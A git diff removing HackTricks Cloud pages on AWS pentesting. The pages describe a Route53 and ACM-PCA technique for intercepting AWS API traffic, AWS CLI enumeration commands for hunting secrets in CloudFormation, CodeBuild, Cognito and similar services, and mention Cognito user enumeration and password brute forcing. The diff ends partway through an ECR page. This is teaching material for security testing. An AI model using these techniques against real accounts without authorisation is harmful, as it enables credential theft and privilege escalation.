-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md b/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md deleted file mode 100644 index 4a13f8e5c..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md +++ /dev/null @@ -1,59 +0,0 @@ -# AWS - Route53 Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -For more information about Route53 check: - -{% content-ref url="../aws-services/aws-route53-enum.md" %} -[aws-route53-enum.md](../aws-services/aws-route53-enum.md) -{% endcontent-ref %} - -### `route53:CreateHostedZone`, `route53:ChangeResourceRecordSets`, `acm-pca:IssueCertificate`, `acm-pca:GetCertificate` - -{% hint style="info" %} -To perform this attack the target account must already have an [**AWS Certificate Manager Private Certificate Authority**](https://aws.amazon.com/certificate-manager/private-certificate-authority/) **(AWS-PCA)** setup in the account, and EC2 instances in the VPC(s) must have already imported the certificates to trust it. With this infrastructure in place, the following attack can be performed to intercept AWS API traffic. -{% endhint %} - -Other permissions **recommend but not required for the enumeration** part: `route53:GetHostedZone`, `route53:ListHostedZones`, `acm-pca:ListCertificateAuthorities`, `ec2:DescribeVpcs` - -Assuming there is an AWS VPC with multiple cloud-native applications talking to each other and to AWS API. Since the communication between the microservices is often TLS encrypted there must be a private CA to issue the valid certificates for those services. **If ACM-PCA is used** for that and the adversary manages to get **access to control both route53 and acm-pca private CA** with the minimum set of permissions described above, it can **hijack the application calls to AWS API** taking over their IAM permissions. - -This is possible because: - -* AWS SDKs do not have [Certificate Pinning](https://www.digicert.com/blog/certificate-pinning-what-is-certificate-pinning) -* Route53 allows creating Private Hosted Zone and DNS records for AWS APIs domain names -* Private CA in ACM-PCA cannot be restricted to signing only certificates for specific Common Names - -**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. 
- -#### Exploitation - -Find the exploitation steps in the original research: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/README.md b/pentesting-cloud/aws-security/aws-services/README.md deleted file mode 100644 index 67243cb53..000000000 --- a/pentesting-cloud/aws-security/aws-services/README.md +++ /dev/null @@ -1,57 +0,0 @@ -# AWS - Services - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Types of services - -### Container services - -Services that fall under container services have the following characteristics: - -* The service itself runs on **separate infrastructure instances**, such as EC2. -* **AWS** is responsible for **managing the operating system and the platform**. -* A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**. -* As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**. -* Also, platform-level identity and access management where it exists. -* **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk. - -### Abstract Services - -* These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**. -* The services are accessed via endpoints using AWS application programming interfaces, APIs. -* The **underlying infrastructure, operating system, and platform is managed by AWS**. -* The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared. -* **Data is isolated via security mechanisms**. -* Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS. - -## Services Enumeration - -**The pages of this section are ordered by AWS service. 
In there you will be able to find information about the service (how it works and capabilities) and that will allow you to escalate privileges.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md b/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md deleted file mode 100644 index a4e9343ab..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md +++ /dev/null @@ -1,101 +0,0 @@ -# AWS - CloudFormation & Codestar Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## CloudFormation - -AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**—a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure. - -### Enumeration - -```bash -# Stacks -aws cloudformation list-stacks -aws cloudformation describe-stacks # You could find sensitive information here -aws cloudformation list-stack-resources --stack-name -aws cloudformation get-template --stack-name cloudformationStack -aws cloudformation describe-stack-events --stack-name cloudformationStack - -## Show params and outputs -aws cloudformation describe-stacks | jq ".Stacks[] | .StackId, .StackName, .Parameters, .Outputs" - -# Export -aws cloudformation list-exports -aws cloudformation list-imports --export-name - -# Stack Sets -aws cloudformation list-stack-sets -aws cloudformation describe-stack-set --stack-set-name -aws cloudformation list-stack-instances --stack-set-name -aws cloudformation list-stack-set-operations --stack-set-name -aws cloudformation list-stack-set-operation-results --stack-set-name --operation-id -``` - -### Privesc - -In the following page you can check how to **abuse cloudformation permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-cloudformation-privesc/" %} -[aws-cloudformation-privesc](../aws-privilege-escalation/aws-cloudformation-privesc/) -{% endcontent-ref %} - -### Post-Exploitation - -Check for **secrets** or sensitive information in the **template, parameters & output** of each CloudFormation - -## Codestar - -AWS CodeStar is a service for creating, managing, and 
working with software development projects on AWS. You can quickly develop, build, and deploy applications on AWS with an AWS CodeStar project. An AWS CodeStar project creates and **integrates AWS services** for your project development toolchain. Depending on your choice of AWS CodeStar project template, that toolchain might include source control, build, deployment, virtual servers or serverless resources, and more. AWS CodeStar also **manages the permissions required for project users** (called team members). - -### Enumeration - -```bash -# Get projects information -aws codestar list-projects -aws codestar describe-project --id -aws codestar list-resources --project-id -aws codestar list-team-members --project-id - - aws codestar list-user-profiles - aws codestar describe-user-profile --user-arn -``` - -### Privesc - -In the following page you can check how to **abuse codestar permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-codestar-privesc/" %} -[aws-codestar-privesc](../aws-privilege-escalation/aws-codestar-privesc/) -{% endcontent-ref %} - -## References - -* [https://docs.aws.amazon.com/cloudformation/](https://docs.aws.amazon.com/cloudformation/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md b/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md deleted file mode 100644 index d80ef3c21..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md +++ /dev/null @@ -1,70 +0,0 @@ -# AWS - CloudFront Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
-
-## CloudFront
-
-CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3.
-
-The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**.
-
-**By default cookie logging is disabled** but you can enable it.
-
-### Functions
-
-You can create functions in CloudFront. These functions will have its **endpoint in cloudfront** defined and will run a declared **NodeJS code**. This code will run inside a **sandbox** in a machine running under an AWS managed machine (you would need a sandbox bypass to manage to escape to the underlaying OS).
-
-As the functions aren't run in the users AWS account. no IAM role is attached so no direct privesc is possible abusing this feature. 
- -### Enumeration - -```bash -aws cloudfront list-distributions -aws cloudfront get-distribution --id # Just get 1 -aws cloudfront get-distribution-config --id - -aws cloudfront list-functions -aws cloudfront get-function --name TestFunction function_code.js - -aws cloudfront list-distributions | jq ".DistributionList.Items[] | .Id, .Origins.Items[].Id, .Origins.Items[].DomainName, .AliasICPRecordals[].CNAME" -``` - -## Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md" %} -[aws-cloudfront-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md) -{% endcontent-ref %} - -## Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-cloudfront-post-exploitation.md" %} -[aws-cloudfront-post-exploitation.md](../aws-post-exploitation/aws-cloudfront-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md b/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
deleted file mode 100644
index 7798cea35..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
+++ /dev/null
@@ -1,102 +0,0 @@
-# AWS - Codebuild Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## CodeBuild
-
-AWS **CodeBuild** is recognized as a **fully managed continuous integration service**. The primary purpose of this service is to automate the sequence of compiling source code, executing tests, and packaging the software for deployment purposes. The predominant benefit offered by CodeBuild lies in its ability to alleviate the need for users to provision, manage, and scale their build servers. This convenience is because the service itself manages these tasks. Essential features of AWS CodeBuild encompass:
-
-1. **Managed Service**: CodeBuild manages and scales the build servers, freeing users from server maintenance.
-2. **Continuous Integration**: It integrates with the development and deployment workflow, automating the build and test phases of the software release process.
-3. **Package Production**: After the build and test phases, it prepares the software packages, making them ready for deployment.
-
-AWS CodeBuild seamlessly integrates with other AWS services, enhancing the CI/CD (Continuous Integration/Continuous Deployment) pipeline's efficiency and reliability.
-
-### **Github/Gitlab/Bitbucket Credentials**
-
-#### **Default source credentials**
-
-This is the legacy option where it's possible to configure some **access** (like a Github token or app) that will be **shared across codebuild projects** so all the projects can use this configured set of credentials.
-
-The stored credentials (tokens, passwords...) are **managed by codebuild** and there isn't any public way to retrieve them from AWS APIs.
-
-#### Custom source credential
-
-Depending on the repository platform (Github, Gitlab and Bitbucket) different options are provided. But in general, any option that requires to **store a token or a password will store it as a secret in the secrets manager**.
-
-This allows **different codebuild projects to use different configured accesses** to the providers instead of just using the configured default one. 
- -### Enumeration - -```bash -# List external repo creds (such as github tokens) -## It doesn't return the token but just the ARN where it's located -aws codebuild list-source-credentials - -# Projects -aws codebuild list-shared-projects -aws codebuild list-projects -aws codebuild batch-get-projects --names # Check for creds in env vars - -# Builds -aws codebuild list-builds -aws codebuild list-builds-for-project --project-name -aws codebuild list-build-batches -aws codebuild list-build-batches-for-project --project-name - -# Reports -aws codebuild list-reports -aws codebuild describe-test-cases --report-arn -``` - -### Privesc - -In the following page, you can check how to **abuse codebuild permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-codebuild-privesc.md" %} -[aws-codebuild-privesc.md](../aws-privilege-escalation/aws-codebuild-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-codebuild-post-exploitation/" %} -[aws-codebuild-post-exploitation](../aws-post-exploitation/aws-codebuild-post-exploitation/) -{% endcontent-ref %} - -### Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md" %} -[aws-codebuild-unauthenticated-access.md](../aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md) -{% endcontent-ref %} - -## References - -* [https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md
deleted file mode 100644
index 1701910c0..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md
+++ /dev/null
@@ -1,130 +0,0 @@
-# AWS - Cognito Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Cognito - -Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple. - -Central to Amazon Cognito are two primary components: - -1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**. -2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication. - -### **User pools** - -To learn what is a **Cognito User Pool check**: - -{% content-ref url="cognito-user-pools.md" %} -[cognito-user-pools.md](cognito-user-pools.md) -{% endcontent-ref %} - -### **Identity pools** - -The learn what is a **Cognito Identity Pool check**: - -{% content-ref url="cognito-identity-pools.md" %} -[cognito-identity-pools.md](cognito-identity-pools.md) -{% endcontent-ref %} - -## Enumeration - -{% code overflow="wrap" %} -```bash -# List Identity Pools -aws cognito-identity list-identity-pools --max-results 60 -aws cognito-identity describe-identity-pool --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367" -aws cognito-identity list-identities --identity-pool-id --max-results 60 -aws cognito-identity get-identity-pool-roles --identity-pool-id - -# Identities Datasets -## Get dataset of identity id (inside identity pool) -aws cognito-sync list-datasets --identity-pool-id --identity-id -## Get info of the dataset -aws cognito-sync describe-dataset --identity-pool-id --identity-id --dataset-name -## Get dataset records -aws cognito-sync list-records --identity-pool-id --identity-id --dataset-name - -# User Pools -## Get pools -aws cognito-idp list-user-pools --max-results 60 - -## Get users 
-aws cognito-idp list-users --user-pool-id - -## Get groups -aws cognito-idp list-groups --user-pool-id - -## Get users in a group -aws cognito-idp list-users-in-group --user-pool-id --group-name - -## List App IDs of a user pool -aws cognito-idp list-user-pool-clients --user-pool-id - -## List configured identity providers for a user pool -aws cognito-idp list-identity-providers --user-pool-id - -## List user import jobs -aws cognito-idp list-user-import-jobs --user-pool-id --max-results 60 - -## Get MFA config of a user pool -aws cognito-idp get-user-pool-mfa-config --user-pool-id - -## Get risk configuration -aws cognito-idp describe-risk-configuration --user-pool-id -``` -{% endcode %} - -### Identity Pools - Unauthenticated Enumeration - -Just **knowing the Identity Pool ID** you might be able **get credentials of the role associated to unauthenticated** users (if any). [**Check how here**](cognito-identity-pools.md#accessing-iam-roles). - -### User Pools - Unauthenticated Enumeration - -Even if you **don't know a valid username** inside Cognito, you might be able to **enumerate** valid **usernames**, **BF** the **passwords** of even **register a new user** just **knowing the App client ID** (which is usually found in source code). 
[**Check how here**](cognito-user-pools.md#registration)**.** - -## Privesc - -{% content-ref url="../../aws-privilege-escalation/aws-cognito-privesc.md" %} -[aws-cognito-privesc.md](../../aws-privilege-escalation/aws-cognito-privesc.md) -{% endcontent-ref %} - -## Unauthenticated Access - -{% content-ref url="../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md" %} -[aws-cognito-unauthenticated-enum.md](../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md) -{% endcontent-ref %} - -## Persistence - -{% content-ref url="../../aws-persistence/aws-cognito-persistence.md" %} -[aws-cognito-persistence.md](../../aws-persistence/aws-cognito-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md b/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md
deleted file mode 100644
index b19805d71..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md
+++ /dev/null
@@ -1,66 +0,0 @@
-# AWS - DocumentDB Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## DocumentDB - -Amazon DocumentDB, offering compatibility with MongoDB, is presented as a **fast, reliable, and fully managed database service**. Designed for simplicity in deployment, operation, and scalability, it allows the **seamless migration and operation of MongoDB-compatible databases in the cloud**. Users can leverage this service to execute their existing application code and utilize familiar drivers and tools, ensuring a smooth transition and operation akin to working with MongoDB. - -### Enumeration - -```bash -aws docdb describe-db-clusters # Get username from "MasterUsername", get also the endpoint from "Endpoint" -aws docdb describe-db-instances #Get hostnames from here - -# Parameter groups -aws docdb describe-db-cluster-parameter-groups -aws docdb describe-db-cluster-parameters --db-cluster-parameter-group-name - -# Snapshots -aws docdb describe-db-cluster-snapshots -aws --region us-east-1 --profile ad docdb describe-db-cluster-snapshot-attributes --db-cluster-snapshot-identifier -``` - -### NoSQL Injection - -As DocumentDB is a MongoDB compatible database, you can imagine it's also vulnerable to common NoSQL injection attacks: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/nosql-injection" %} - -### DocumentDB - -{% content-ref url="../aws-unauthenticated-enum-access/aws-documentdb-enum.md" %} -[aws-documentdb-enum.md](../aws-unauthenticated-enum-access/aws-documentdb-enum.md) -{% endcontent-ref %} - -## References - -* [https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
deleted file mode 100644
index f33f7488f..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
+++ /dev/null
@@ -1,131 +0,0 @@
-# AWS - ECR Enum
-
-## AWS - ECR Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -### ECR - -#### Basic Information - -Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images. - -ECR is compose by 2 types of objects: **Registries** and **Repositories**. - -**Registries** - -Every AWS account has 2 registries: **Private** & **Public**. - -1. **Private Registries**: - -* **Private by default**: The container images stored in an Amazon ECR private registry are **only accessible to authorized users** within your AWS account or to those who have been granted permission. - * The URI of a **private repository** follows the format `.dkr.ecr..amazonaws.com/` -* **Access control**: You can **control access** to your private container images using **IAM policies**, and you can configure fine-grained permissions based on users or roles. -* **Integration with AWS services**: Amazon ECR private registries can be easily **integrated with other AWS services**, such as EKS, ECS... -* **Other private registry options**: - * The Tag immutability column lists its status, if tag immutability is enabled it will **prevent** image **pushes** with **pre-existing tags** from overwriting the images. - * The **Encryption type** column lists the encryption properties of the repository, it shows the default encryption types such as AES-256, or has **KMS** enabled encryptions. - * The **Pull through cache** column lists its status, if Pull through cache status is Active it will cache **repositories in an external public repository into your private repository**. - * Specific **IAM policies** can be configured to grant different **permissions**. 
